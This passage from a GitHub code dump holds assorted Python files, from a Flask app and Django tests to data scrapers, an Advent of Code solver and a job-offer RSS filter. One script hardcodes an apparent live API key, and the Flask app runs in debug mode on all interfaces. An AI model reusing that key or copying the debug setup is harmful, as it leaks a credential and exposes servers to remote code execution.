edit_canvas_save():\n edited_content = request.form['edited_content']\n selected_filename = request.form['filename']\n edit_and_save_canvas_file(selected_filename, edited_content)\n return redirect(url_for('edit_canvas'))\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5400)\n","repo_name":"JupyterJones/FlaskAppArchitect_Flask_App_Creator","sub_path":"JAVA.py","file_name":"JAVA.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"3424376372","text":"from celery_progress.backend import ProgressRecorder\nfrom django_mock_queries.query import MockSet\nfrom django.test import TestCase\nfrom mock import patch\n\nfrom twitter.models import User, Tweet, Query\nfrom twitter.register import UserRegister, TweetRegister\nfrom twitter.tasks import get_tweets_response, register_tweets\nfrom twitter.twitter import TweetLookup, UserLookup\n\n\nclass TestWordpressTasks(TestCase):\n user_object = [\n User(\n id=100,\n name='name',\n username='username',\n created_at='01/01/2021',\n profile_image_url='profile_image_url',\n protected=True,\n public_metrics='public_metrics',\n verified=True,\n description='description',\n location='location',\n url='url'\n )\n ]\n tweet_object = [\n Tweet(\n id=100,\n text='texto de prueba',\n author=user_object[0],\n conversation_id=300,\n created_at='01/01/2021',\n lang='es'\n )\n ]\n qs_tweet_mock = MockSet(tweet_object[0])\n query_object = [\n Query(\n id=100,\n text=\"query\"\n )\n ]\n qs_query_mock = MockSet(query_object[0])\n expected_tweets = {\n 'created_at': '2021-06-23T10:10:48.000Z', 'id': '1407642286956056579',\n 'conversation_id': '1407642286956056579',\n 'text': \"RT @DaysForGirls: How does #menstrualequity relate to #selfcare? Join DfG, @washunited & \"\n \"@MietAfrica next week as we kick off this year's S…\",\n 'lang': 'en', 'author_id': '1398144816223948803'\n }\n\n expected_user = {\n 'id': 100,\n 'name': 'name',\n 'username': 'username',\n 'created_at': '01/01/2021',\n 'profile_image_url': 'profile_image_url',\n 'protected': True,\n 'public_metrics': 'public_metrics',\n 'verified': True,\n 'description': 'description',\n 'location': 'location',\n 'url': 'url'\n }\n\n @patch.object(TweetLookup, 'search_tweets', return_value=expected_tweets)\n @patch.object(ProgressRecorder, 'set_progress')\n def test_get_tweets_response(self, get_post_types, progress):\n tweets = get_tweets_response('texto')\n\n assert tweets == self.expected_tweets\n\n @patch.object(Tweet.objects, 'find_by_id', return_value=MockSet())\n @patch.object(User.objects, 'find_by_id', return_value=MockSet())\n @patch.object(UserLookup, 'search_user', return_value=expected_user)\n @patch.object(UserRegister, 'execute', return_value=user_object[0])\n @patch.object(TweetRegister, 'execute', return_value=tweet_object[0])\n @patch.object(Tweet.objects, 'find_by_id', return_value=qs_tweet_mock)\n @patch.object(MockSet, 'get')\n @patch.object(User.objects, 'add_tweet')\n @patch.object(Query.objects, 'find_by_text', return_value=qs_query_mock)\n @patch.object(Query.objects, 'add_tweet')\n @patch.object(ProgressRecorder, 'set_progress')\n def test_register_tweets_with_new_user(self, progress, ufind, usearch, uexecute, texecute, tfinf2, tget,\n uadd, qfind, qadd, tfind):\n register_tweets([self.expected_tweets], 'texto')\n\n assert ufind.called\n assert usearch.called\n assert uexecute.called\n assert texecute.called\n","repo_name":"jaigor/fakenews_extractor","sub_path":"twitter/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32777971010","text":"import requests\nfrom save_file import save_to_database\nimport sys\nimport os\nimport django\n\n# Добавьте путь к вашему Django проекту в список путей Python\nsys.path.append('/home/ubunto/Desktop/SAL/mysite')\n\n# Устанавливаем переменную окружения DJANGO_SETTINGS_MODULE на ваш файл settings.py\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')\ndjango.setup()\n\napi_key = '9311adde05f18107c8ddaf5f88f72024c1c50a6cd2497dcd4823200c00e5f5e4'\nurl = 'https://opendata.mkrf.ru/v2/cinema/75?l=1000'\n\nheaders = {\n 'Accept': 'application/json',\n 'X-API-KEY': api_key,\n}\n\ntry:\n response = requests.get(url, headers=headers)\n\n if response.status_code == 200:\n data = response.json()\n i = 0\n\n for item in data.get('data', []):\n item_id = item.get('data', {}).get('general', {}).get('id')\n item_name = item.get('data', {}).get('general', {}).get('name')\n item_locale = item.get('data', {}).get('general', {}).get('locale', {}).get('name')\n item_website = item.get('data', {}).get('general', {}).get('contacts', {}).get('website')\n item_email = item.get('data', {}).get('general', {}).get('contacts', {}).get('email')\n\n save_to_database(item_id, item_name, item_locale, item_website, item_email)\n print(f'ID: {item_id}, Name: {item_name}, Locale: {item_locale}, Website: {item_website}, Email: {item_email},')\n i+=1\n print('qewrqwer =', i)\n else:\n print(f'Ошибка при выполнении запроса: {response.status_code}')\nexcept Exception as e:\n print(f'Произошла ошибка: {str(e)}')","repo_name":"Rusy13/Parser_API","sub_path":"mysite/scripts/data_from_api.py","file_name":"data_from_api.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5396843088","text":"import os \nimport json \nimport read\nimport time\nimport boto3 \n\ndef cleanOutDir(dir,targetDir,ip):\n #print(\"cleanOut: cleaning \"+dir+\"... \") \n for item in os.scandir(dir): \n if item.path.endswith(\".json\") & item.is_file():\n tmpContent = read.getSingleFileContent(item.path)\n if tmpContent[\"Stats\"][\"PacketLossPercent\"] != \"0\":\n #print(\"found invalid ping data in \"+item.name) \n isExist = os.path.exists(targetDir)\n if not isExist: \n os.makedirs(targetDir)\n f = open(targetDir+\"/\"+item.name,\"w\")\n json.dump(tmpContent,f)\n f.close() \n #print(\"renaming \"+item.path)\n os.rename(item.path,item.path+\".bak\")\n elif item.path.endswith(\".bak\"):\n os.remove(item.path)\n\ndef filter(p,pt,ip,ds):\n while True:\n retString = \"\"\n #print(\"Filter: filtering \"+ip+\" from \"+p+\"to \"+pt+\", from folders older than \"+str(ds)+\" seconds\")\n ipDir = p+'/'+ip\n ipTargetDir = pt+'/'+ip\n print(\"Filter: iterate into \"+ipDir)\n currentTime = int(time.time())\n threshold = currentTime - ds\n for subDir in os.scandir(ipDir):\n if subDir.is_dir() & subDir.name.isnumeric():\n #print(\"taversing into \"+subDir.name+\"... \")\n if int(subDir.name) < threshold: \n if len(os.listdir(ipDir+\"/\"+subDir.name)) == 0:\n os.rmdir(ipDir+\"/\"+subDir.name)\n else: \n cleanOutDir(ipDir+\"/\"+subDir.name,ipTargetDir+\"/\"+subDir.name,ip)\n else: \n print(subDir.name + \" is not a valid directory, skipping.\") \n time.sleep(600) \n return retString\n\n","repo_name":"ThomasReulen/pinger","sub_path":"frontend/src/filesorter.py","file_name":"filesorter.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11021240186","text":"import collections\n\nclass DependenciesProcessor:\n wants = {\"product\"}\n\n def __init__(self, db):\n self.db = db\n self.dependency_map = collections.defaultdict(list)\n\n async def prepare(self):\n pass\n\n async def process(self, data):\n prod = data.product\n if prod is None:\n return\n win_builds = [\n build for build in prod.builds\n if build.os == \"windows\" and build.generation == 2\n ]\n if win_builds:\n latest_build = win_builds[-1]\n repo = await self.db.repository.load(prod.id, latest_build.id)\n if repo is None:\n return\n for dependency in repo.get(\"dependencies\", []):\n self.dependency_map[dependency].append({\"id\": prod.id, \"title\": prod.title})\n\n async def finish(self):\n for game_list in self.dependency_map.values():\n game_list.sort(key=lambda x: x[\"id\"])\n await self.db.dependencies.save(self.dependency_map)\n","repo_name":"Yepoleb/gogdb","sub_path":"gogdb/updater/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"39"} +{"seq_id":"35078558539","text":"import os\n\nimport pandas as pd\n\nimport pricing.data.answers_conversions_dictionaries as acd\n\nRAWDATADIRPATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'raw_data')\nPREPROCDATADIRPATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'preprocessed_data')\n\n\nclass DataPreprocesser:\n\n def __init__(self, path=None, no_basic_preprocessing=False, columns_to_remove=None):\n rawdata = pd.read_csv(os.path.join(RAWDATADIRPATH, 'rawdata.csv') if path is None else path)\n\n if not no_basic_preprocessing:\n # remove useless columns\n if columns_to_remove is not None:\n rawdata.drop(rawdata.columns[columns_to_remove], axis=1, inplace=True)\n\n # unify columns\n convs = acd.anwswers_translations()\n for c in convs:\n rawdata = rawdata.replace(to_replace=c[0], value=c[1])\n col2col = acd.question_to_question()\n nans = rawdata.isna()\n for c2c in col2col:\n for i in range(rawdata.shape[0]):\n if nans[c2c[1]][i]:\n rawdata.set_value(index=i, col=c2c[1], value=rawdata[c2c[0]][i])\n for c2c in col2col:\n rawdata = rawdata.drop(labels=[c2c[0]], axis=1)\n\n # simplify column names\n for column in rawdata:\n rawdata.rename(columns={column: col2col[next(i for i, lst in enumerate(col2col) if column in lst)][2]},\n inplace=True)\n\n # fix categorical data\n for c in convs:\n # more readable names\n rawdata = rawdata.replace(to_replace=c[1], value=c[2])\n\n rawdata.replace(('Yes', 'No'), (1, 0), inplace=True)\n\n for column in self.__get_categorical_columns(rawdata):\n dummies = pd.get_dummies(rawdata[column], prefix=column)\n rawdata.drop(column, axis=1, inplace=True)\n rawdata = pd.concat([rawdata, dummies], axis=1)\n\n self.data = rawdata\n\n def get_processed_data(self):\n return self.data\n\n def process_data(self, function_headers_list):\n for foo in function_headers_list:\n self.data = foo(self.data)\n\n def save_data(self, path=None):\n self.data.to_csv(os.path.join(PREPROCDATADIRPATH, 'processed_data.csv') if path is None else path, index=False)\n\n def __get_categorical_columns(self, dataframe):\n cols = dataframe.columns\n num_cols = dataframe._get_numeric_data().columns\n return list(set(cols) - set(num_cols))\n\n\nif __name__ == '__main__':\n # dp = DataPreprocesser(columns_to_remove=[0, 1])\n # dp.save_data()\n print(DataPreprocesser(path='./preprocessed_data/processed_data.csv', no_basic_preprocessing=True).data)\n","repo_name":"MatteoBiasielli/PricingInECommerce","sub_path":"pricing/data/DataPreprocesser.py","file_name":"DataPreprocesser.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"9380343034","text":"# -*- coding: utf-8 -*-\nimport re\nimport json\nfrom bs4 import BeautifulSoup\n\n\nclass Parser:\n def get(self, response):\n movie = {\n 'group': {},\n 'episode': [],\n 'links': [],\n }\n\n soup = BeautifulSoup(response, \"html.parser\")\n servers = soup.select('div#halim-list-server > div.halim-server')\n\n for server in servers:\n server_name = server.select_one('> span.halim-server-name').getText().strip().encode('utf-8')\n if server_name not in movie['group']: movie['group'][server_name] = []\n for ep in server.select('ul.halim-list-eps > li'):\n if ep.select_one('a'):\n ep = ep.select_one('a > span')\n else:\n ep = ep.select_one('span')\n\n movie['group'][server_name].append({\n 'link': \"{},{},{}\".format(ep.get('data-episode-slug'),\n ep.get('data-server'),\n ep.get('data-post-id')),\n 'title': ep.get('data-episode-slug').encode('utf-8')\n })\n\n return movie\n\n def get_link(self, response):\n movie = {\n 'group': {},\n 'episode': [],\n 'links': [],\n }\n\n sources = json.loads(response).get('data').get('sources')\n # print(sources.encode('utf8'))\n\n js_sources = re.search(r'sources:\\s(\\[.*?\\])', sources).group(1)\n if js_sources and 'not-a-real-video-file' not in js_sources:\n js_sources = json.loads(js_sources)\n for s in js_sources:\n movie['links'].append({\n 'link': s.get('file'),\n 'title': 'Link {}'.format(s.get('label')),\n 'type': s.get('type'),\n 'resolve': False,\n 'originUrl': 'http://fimfast.tv',\n })\n\n source = re.search(r\"=0 and i < len(shortestpaths) and not visited[i][startj]:\n dist = rev*(ord(map[i][startj])-ord(map[starti][startj]))\n if dist<=1:\n # ways.append((i,startj))\n path = shortestpaths[starti][startj]+1\n currentpath = shortestpaths[i][startj]\n if path=0 and j < len(shortestpaths[0]) and not visited[starti][j]:\n dist = rev*(ord(map[starti][j])-ord(map[starti][startj]))\n if dist<=1:\n # ways.append((starti,j)) \n path = shortestpaths[starti][startj]+1\n currentpath = shortestpaths[starti][j]\n if path0:\n if max is not None and shortestpaths[unvisited[0][0]][unvisited[0][1]]>max:\n # if current shortest is larger than max, no shorter paths available\n return 1e300,shortestpaths\n shortestpaths,visited=find_ways(*unvisited[0],shortestpaths,visited)\n unvisited = get_unvisited(visited,shortestpaths)\n \n return shortestpaths[target[0]][target[1]],shortestpaths\n\ndef find_shortest_path_to_a(map,source,target):\n shortestpaths=[[1e300 for b in map[0]] for c in map]\n\n visited=[[False for b in map[0]] for c in map]\n\n shortestpaths[source[0]][source[1]]=0\n unvisited=get_unvisited(visited,shortestpaths)\n while not visited[target[0]][target[1]] and len(unvisited)>0:\n if map[unvisited[0][0]][unvisited[0][1]]=='a':\n return shortestpaths[unvisited[0][0]][unvisited[0][1]],shortestpaths\n shortestpaths,visited=find_ways(*unvisited[0],shortestpaths,visited,True)\n unvisited = get_unvisited(visited,shortestpaths)\n\n return shortestpaths[target[0]][target[1]],shortestpaths\n\npart1,shortestpaths = find_shortest_path(map,source,target)\n\nprint('------------------------')\nprint('Part 1:',part1)\nprint('------------------------')\n\nbest,shortestpaths=find_shortest_path_to_a(map,target,source)\n\nprint_map(shortestpaths,map,target,source,'output.txt')\n\nprint('Part 2:',best)\nprint('------------------------')","repo_name":"psundstrom/advent-of-code-2022","sub_path":"Day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7980875267","text":"from requests import Response, Session\nfrom pandas import concat, DataFrame, Series, to_datetime\nfrom datetime import timedelta\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef download_past_hour(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"h\": str(page), \"f\": \"j\"})\n for page in range(1, 3)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Average powerdraw (W)\")\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_day(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"w\": str(page), \"f\": \"j\"})\n for page in range(1, 4)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Average powerdraw (W)\")\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_week(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"d\": str(page), \"f\": \"j\"})\n for page in range(1, 7)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Average powerdraw (W)\")\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_year(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"m\": str(page), \"f\": \"j\"})\n for page in range(1, 13)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Total power consumed (kWh)\", True)\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef response_to_dataframe(\n response: Response, value_label: str, date_only=False\n) -> DataFrame:\n data = response.json()\n initial_time = to_datetime(data[\"tm\"])\n time_offset = timedelta(seconds=data[\"dt\"])\n\n values = Series(data[\"val\"]).dropna()\n times = Series(\n [initial_time + i * time_offset for i in range(len(values))]\n )\n\n if date_only:\n times = times.dt.date\n\n if data[\"un\"] == \"kWh\":\n values = values.str.replace(\",\", \".\").astype(float)\n else:\n values = values.astype(int)\n\n return DataFrame({\"time\": times, value_label: values}).set_index(\"time\")\n","repo_name":"brain-dev-null/electrolog","sub_path":"electrolog/data/download_functions.py","file_name":"download_functions.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37883539271","text":"\"\"\"\nEnunciado:\nEscribe un programa que lea 5 números por teclado y que los almacene en una lista. Rota los elementos de esa lista, es\ndecir, el elemento de la posición 0 debe pasar a la posición 1, el de la 1 a la 2, etc. El número que se encuentra en\nla última posición debe pasar a la posición 0. Finalmente, muestra el contenido de la lista.\n\nFecha: 21/11/2023.\nAutores: Sergio López Fernández.\n\"\"\"\n\nprint(\"Este programa rota los elementos de una lista.\")\nprint(\"----------------------------------------------\")\n\nTOTAL_NUM = 5\nnumbers_list = []\n\nprint(\"Introduce números enteros:\")\nfor i in range(TOTAL_NUM):\n numbers_list.append(int(input()))\n\nprint(\"Lista original:\", numbers_list)\n\nlast_number = numbers_list[TOTAL_NUM - 1]\nfor i in range(TOTAL_NUM - 1, 0, -1):\n numbers_list[i] = numbers_list[i - 1]\nnumbers_list[0] = last_number\n\nprint(\"Lista rotada:\", numbers_list)\n","repo_name":"a21lofese/PIA","sub_path":"Arrays/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16518144407","text":"from typing import List, Mapping\n\nfrom aiologger import Logger\n\nimport container\nfrom apps.api.main_app.v1.services.notifications import NotificationService\n\n\n@container.register\nclass GetNotificationsCase:\n def __init__(\n self,\n logger: Logger,\n service: NotificationService,\n ):\n self._logger = logger\n self._service = service\n\n async def __call__(self, user_id: str) -> List[Mapping]:\n return await self._service.get_notifications(user_id)\n","repo_name":"pavivin/fastapi-di","sub_path":"src/apps/api/main_app/v1/cases/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70453249321","text":"n = int(input())+1\r\nmatriz = []\r\nfor j in range(n):\r\n linha = []\r\n a = input().split()\r\n for k in range(n):\r\n linha.append(int(a[k]))\r\n matriz.append(linha)\r\nfor l in range(0,n-1):\r\n for c in range(0,n-1):\r\n cont = 0\r\n if matriz[l][c] == 1:\r\n cont += 1\r\n if matriz[l][c+1] == 1:\r\n cont += 1\r\n if matriz[l+1][c] == 1:\r\n cont += 1\r\n if matriz[l+1][c+1] == 1:\r\n cont += 1\r\n if cont > 1:\r\n print('S', end='')\r\n else:\r\n print('U', end='')\r\n print('')","repo_name":"juan-araujob/uri-online-judge","sub_path":"2168.py","file_name":"2168.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22424483256","text":"'''\nSnorkel Candidate Version\n\n'''\nimport os\nimport sys\nimport glob\nimport hashlib\nimport cPickle\nfrom datetime import datetime\n\ndef dict2str(d):\n '''Convert dictionary to tuple pair string'''\n return str(d).encode(\"utf-8\",errors=\"ignore\")\n\n\ndef checksum(s):\n '''Create checksum for input object'''\n if type(s) is dict:\n s = dict2str(s)\n elif type(s) in [list,tuple]:\n s = \"|\".join(sorted(list(s)))\n m = hashlib.md5()\n m.update(s)\n return m.hexdigest()\n\n\ndef cands2str(candidates):\n '''Convert DeepDive Relations object to string'''\n convert = lambda x:x.encode(\"utf-8\",errors=\"ignore\")\n rela_func = lambda x:[\"{}:{}\".format(x.sentence[\"doc_id\"], x.sentence[\"sent_id\"])] + map(convert,x.mention1(\"words\")) + map(convert,x.mention2(\"words\"))\n entity_func = lambda x:[\"{}:{}\".format(x.sentence[\"doc_id\"], x.sentence[\"sent_id\"])] + map(convert,x.get_span())\n get_row = rela_func if str(type(candidates)) == \"Relations\" else entity_func\n # create string versions of candidates\n s = [\":\".join(get_row(c)) for c in candidates]\n return \"|\".join(sorted(s))\n\n\nclass CandidateVersioner(object):\n '''Create unique version ID for candidate set while saving to disk'''\n def __init__(self, rootdir, prefix=\"\", dicts={}):\n self.rootdir = rootdir\n self.prefix = prefix\n self.dicts = dicts\n self._candidates = {}\n self.filename = None\n self.checksum = None\n \n \n def snapshot(self, name, candidates):\n self._candidates[name] = candidates\n \n \n def save(self):\n '''Save checksummed version of candidate set. This computes\n checksums based on dictionaries, input documents, and final\n candidate set'''\n candidates = reduce(lambda x,y:x+y, self._candidates.values())\n manifest = self._checksums(candidates, self.dicts)\n # dump candidates and log file\n ctype = \"RELATIONS.\" if str(type(self._candidates)) == \"Relations\" else \"ENTITIES.\"\n prefix = self.prefix + \".\" if self.prefix else \"\"\n self.filename = \"{}/{}{}{}\".format(self.rootdir,prefix,ctype,manifest[\"uid\"])\n \n cPickle.dump(self._candidates, open(\"{}.pkl\".format(self.filename),\"w\"))\n self._write_log(self.filename,manifest)\n self.checksum = manifest[\"uid\"]\n \n \n def load(self,checksum):\n filelist = glob.glob(\"{}*{}.pkl\".format(self.rootdir,checksum))\n if len(filelist) > 1:\n print>>sys.stderr,\"Warning: multiple matching checksums\" \n elif not len(filelist):\n print>>sys.stderr,\"Error: snapshot not found\" \n return {} \n fname = filelist[0]\n self._candidates = cPickle.load(open(fname,\"rb\"))\n self.filename = fname.strip(\".pkl\")\n self.checksum = checksum\n return self._candidates\n\n \n def _checksums(self, candidates, dicts):\n '''Compute MD5 checksums for all assets used to \n create this candidate set'''\n manifest = {}\n # dictionary checksums\n for name,d in dicts.items():\n manifest[\"dictionary:{}\".format(name)] = checksum(d) \n # doc and candidate checksum\n doc_ids = sorted(set([c.sentence[\"doc_id\"] for c in candidates]))\n manifest[\"doc_ids\"] = checksum(doc_ids)\n manifest[\"candidates\"] = checksum(cands2str(candidates))\n # some count data about candidates\n manifest[\"num_docs\"] = len(doc_ids)\n manifest[\"num_candidates\"] = len(candidates)\n # create unique checksum ID\n _,values = zip(*sorted(manifest.items()))\n values = map(str,values)\n manifest[\"uid\"] = checksum(reduce(lambda x,y:x+y,values))\n return manifest\n \n \n def _write_log(self,filename,manifest):\n # write checksums to text file\n ts = datetime.now()\n outfile = \"{}.checksums\".format(filename)\n with open(outfile,'w') as f:\n f.write(\"{0:<22}{1:^11}{2:<32}\\n\".format(\"ts\",\"=\",str(ts)))\n for key,value in sorted(manifest.items()):\n f.write(\"{0:<22}{1:^11}{2:<32}\\n\".format(key,\"=\",value))\n \n \n\n\n","repo_name":"HazyResearch/ddbiolib","sub_path":"ddbiolib/versioning/base_snorkel.py","file_name":"base_snorkel.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"3284579120","text":"from flask import Flask #nome minusculo pacote, nome maiusculo recurso/classe\nfrom flask_restful import Api\nfrom resources.hotel import Hoteis, Hotel # pasta que se torna pacote e dentro deste pacote, estamos chamando o arquivo hotel e importando a classe hoteis que é um recurso\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db' #caminho do banco\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napi = Api(app)\n\n@app.before_first_request #antes de tudo verifica se tem banco\ndef cria_banco(): #criando banco\n banco.create_all() # criando tabela\n\napi.add_resource(Hoteis, '/hoteis')\napi.add_resource(Hotel, '/hoteis/')\n\nif __name__ == '__main__': # se for chamado do app.py vai executar\n from sql_alchemy import banco\n banco.init_app(app)\n app.run(debug=True)\n\n# http://127.0.0.1:5000/hoteis -> raiz do site localhost / hoteis\n","repo_name":"Diagnoster/RestApi_bd","sub_path":"api rest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22503324562","text":"\ndetails = ['ahmed', 'a@a.com', 35, '01025465465', '0152146554']\nname, mail, age, *phone_numbers = details\n\nprint(mail)\nprint(name)\nprint(phone_numbers)\n\n# ______________________________________________________________\n\ndata = [\n ('male', 10, 12),\n ('female', 5, 7, 12)\n]\n\n\ndef males(data):\n return sum(data)\n\n\ndef females(data):\n return sum(data) * 2\n\n\nfor tag, *details_ in data:\n if tag == 'male':\n print(males(details_))\n if tag == 'female':\n print(females(details_))\n\n\n# ______________________________________________________________\n\ndef path_splitter(path: str):\n *root, dirName, fileName = path.split('\\\\')\n return {\"dir name\": dirName,\n \"file name\": fileName}\n\n\nprint(path_splitter(r\"/Data_structures_and Algorithmes/useful_astrisk.py\"))\n\n","repo_name":"mo-a1/intermediate-python3","sub_path":"Recipes From python cook book 3rd edition/Data_structures_and Algorithmes/useful_astrisk.py","file_name":"useful_astrisk.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4400200132","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/3 11:13\n# @Author : Jamerri\n# @File : 4-8.py\n\ncubes = []\nfor value in range(1, 11):\n cube = value**3\n cubes.append(cube)\n\nprint(cubes)\n","repo_name":"jamerri/python_learning","sub_path":"chapter-four/4-8.py","file_name":"4-8.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17284560306","text":"import psonic\nimport random\n\ne = psonic.chord(psonic.E3, psonic.MINOR)\nprint(e)\n\n# Challenge: Write a while loop that randomly plays a note from the \n# e minor cord, for either 0.25, or 0.5 length of time\n# after it plays 30 notes it should stop\nwhile True:\n psonic.use_synth(psonic.PROPHET)\n psonic.play(random.choice(e), release=0.6)\n psonic.sleep(random.choice([0.25, 0.5]))","repo_name":"eecs110/winter2019","sub_path":"course-files/lectures/lecture_07/answers/12_random_music_1.py","file_name":"12_random_music_1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37343774629","text":"from datetime import datetime, timezone, timedelta, date\nimport feedparser\nimport requests\nimport telegram\nimport time\nimport json\nimport os\nimport sys\n\nTOKEN = os.environ['TELEGRAM_TOKEN']\nCHAT_ID = 0 # Your chat ID goes here\nTIMELIMIT = 90000 # Around 25 hours\nTAGS = ['python', 'java']\n\n\ndef check_if_remoteokio_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', '1991-01-24T03:00:00-00:00')[:-6]\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%dT%H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA', 'America']\n entry_region = entry.get('location', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the entry does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_tags = [t.get('term', '').upper() for t in entry.get('tags', [])]\n\n if not any(t in entry_tags for t in tags):\n return False\n\n return True\n\ndef check_if_weworkremotely_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', 'Thu, 24 Jan 1991 03:00:00 +0000')\n entry_date = datetime.strptime(parsed_date, '%a, %d %b %Y %H:%M:%S %z').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA Only', 'North America Only']\n entry_region = entry.get('region', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the summary does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_summary = entry.get('summary', '').upper()\n\n if not any(t in entry_summary for t in tags):\n return False\n\n return True\n\ndef check_if_workingnomads_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('pub_date', '1991-01-24T03:00:00-00:00')[:19]\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%dT%H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA', 'America']\n entry_region = entry.get('location', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the entry does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_tags = entry.get('tags').upper()\n #print(entry_tags)\n\n if not any(t in entry_tags for t in tags):\n return False\n\n return True\n\ndef check_if_remoteio_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', '1991-01-24 03:00:00')\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%d %H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if no tags are in the summary or the title\n tags = [t.upper() for t in TAGS]\n entry_summary = entry.get('summary', '').upper()\n entry_title = entry.get('title', '').upper()\n\n if not any(t in entry_summary for t in tags) and not any(t in entry_title for t in tags):\n return False\n\n return True\n\ndef check_if_githubjobs_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('created_at', 'Thu Jan 24 03:00:00 UTC 1991')\n entry_date = datetime.strptime(parsed_date, '%a %b %d %H:%M:%S UTC %Y').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n return True\n\n\ndef get_remoteio_offers():\n print('Getting Remote.io offers...')\n rss = feedparser.parse('https://s3.remote.io/feed/rss.xml')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_remoteio_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('published'), '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%Y'),\n 'link': 